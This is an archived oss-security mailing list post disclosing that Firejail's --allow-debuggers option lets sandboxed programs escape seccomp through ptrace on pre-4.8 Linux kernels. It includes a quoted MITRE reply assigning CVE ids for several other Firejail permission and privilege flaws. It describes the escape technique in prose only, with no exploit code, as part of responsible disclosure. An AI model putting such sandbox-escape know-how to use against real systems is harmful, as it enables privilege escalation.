oss-sec mailing list archives
Re: Re: Firejail local root exploit
From: Lizzie Dixon <_ () lizzie io>
Date: Fri, 6 Jan 2017 22:51:10 +0100
Hello oss-security, I was inspired by this thread so I took a look as well. I noticed that firejail allows ptrace with --allow-debuggers, which allows a sandboxed program to escape the seccomp profile by rewriting permitted system calls into unpermitted ones pre-Linux-4.8. This is documented in the seccomp manpage: http://man7.org/linux/man-pages/man2/seccomp.2.html
Before kernel 4.8, the seccomp check will not be run again after the tracer is notified. (This means that, on older kernels, seccomp-based sandboxes must not allow use of ptrace(2)—even of other sandboxed processes—without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.)
(I wrote a little program demonstrating this behavior last year at https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.51 ). I emailed the author and they commited a fix (within 45 minutes!): https://github.com/netblue30/firejail/commit/6b8dba29d73257311564ee7f27b9b14758cc693e#diff-18143ef0a33f3f378f310a976725f141R80 Should this have a CVE id as well? Best, Lizzie. On 01/06, cve-assign () mitre org wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA2561. --tmpfsUse CVE-2016-10117.2. Nuke /etc/resolv.confUse CVE-2016-10118./tmp was mounted tmpfs 0777 prior to: commit aa28ac9e09557b833f194f594e2940919d940d1fUse CVE-2016-10119./dev, /dev/shm, /var/tmp, /var/lock were mounted 0777 prior to: commit cd0ecfc7a7b30abde20db6dea505cd8c58e7c046Use CVE-2016-10120.There are other weak perms fixed around here eg /dev/shm/firejail was 0777 prior to: commit 1cab02f5ae3c90c01fae4d1c16381820b757a3a6Use CVE-2016-10121.4. Environment not cleaned before root exec()Use CVE-2016-10122.don't allow --chroot as user without seccomp supportUse CVE-2016-10123. - -- CVE Assignment Team M/S M300, 202 Burlington Road, Bedford, MA 01730 USA [ A PGP key is available for encrypted communications at http://cve.mitre.org/cve/request_id.html ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCAAGBQJYb1OiAAoJEHb/MwWLVhi2N9kP/0AHycN7Au+PTq/bHoxXVi4l 74YrEI8PcE1UHIkL2m1kOLbZGTWWc8E0uMEJFTfKrVoIPAINN3iYtU9dYukSACxu 4gyQK8xWuzpbqBeF/PIBaZsp9THvTy7sfz2dKYDh/n5i0AFRv34/cs8BUIcl9BDE 4D/1FgdwLqarh0SJvclJRBmi4zmftqub3xbt1dJItSfc/5u5SxWMHqHbmW5vESIf y3LU27S7E2qnSARfHxk1HfdqViDQO/76yYLQqlfGRc23wyj7ydFWQpRC28x0jjOL SCiC91a2gG7nGyV1l/uFIF8QAQMACNl3uJT/5Hgp8ugUOVAko81u/o0liNJMthRK NGWhENcFRuHqlqqxvOME/DfErfa7gn2cgFi+udl2BMfllCJb2ICH+Ddg9joaFLfu 33iPga5J0MB5YSPQYoCSERjz2Q/i65P9kzgeTjGRLOhHsfY4p6yxUr/YmqTJ9E+W DXiTCbpxNJXEsopKwHODBD4ausPQ83A8LGPine7eGaJKoW3q8UdphDqOqitCRFEL d/XkVjtt44N0wgjB/ABDezrRAYbRPSudcCDPYh7WVl6V/6D0YRuaqYJ/Q8LlT+Nl /17KzyEunx/+0lBjvdtyGz2UQN8F7+9XKl/S0ZRBJS9i+Hrb4ShctP53h2aNbTQT nC4OrYY4JBuW90DY4Ef2 =DJ5s -----END PGP SIGNATURE-----
Current thread:
- Firejail local root exploit Sebastian Krahmer (Jan 04)
- Re: Firejail local root exploit cve-assign (Jan 04)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 05)
- Re: Firejail local root exploit cve-assign (Jan 06)
- Re: Re: Firejail local root exploit sivmu (Jan 06)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 07)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 08)
- Re: Re: Firejail local root exploit Simon McVittie (Jan 08)
- Re: Re: Firejail local root exploit Brad Spengler (Jan 08)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 08)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 05)
- Re: Firejail local root exploit cve-assign (Jan 04)
- Re: Re: Firejail local root exploit Lizzie Dixon (Jan 06)
- Re: Firejail local root exploit cve-assign (Jan 07)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 07)
- Re: Firejail local root exploit cve-assign (Jan 07)
- Re: Firejail local root exploit cve-assign (Jan 06)
- Re: Re: Firejail local root exploit Thomas Deutschmann (Jan 31)
- <Possible follow-ups>
- Re: Re: Firejail local root exploit Thomas Deutschmann (Feb 09)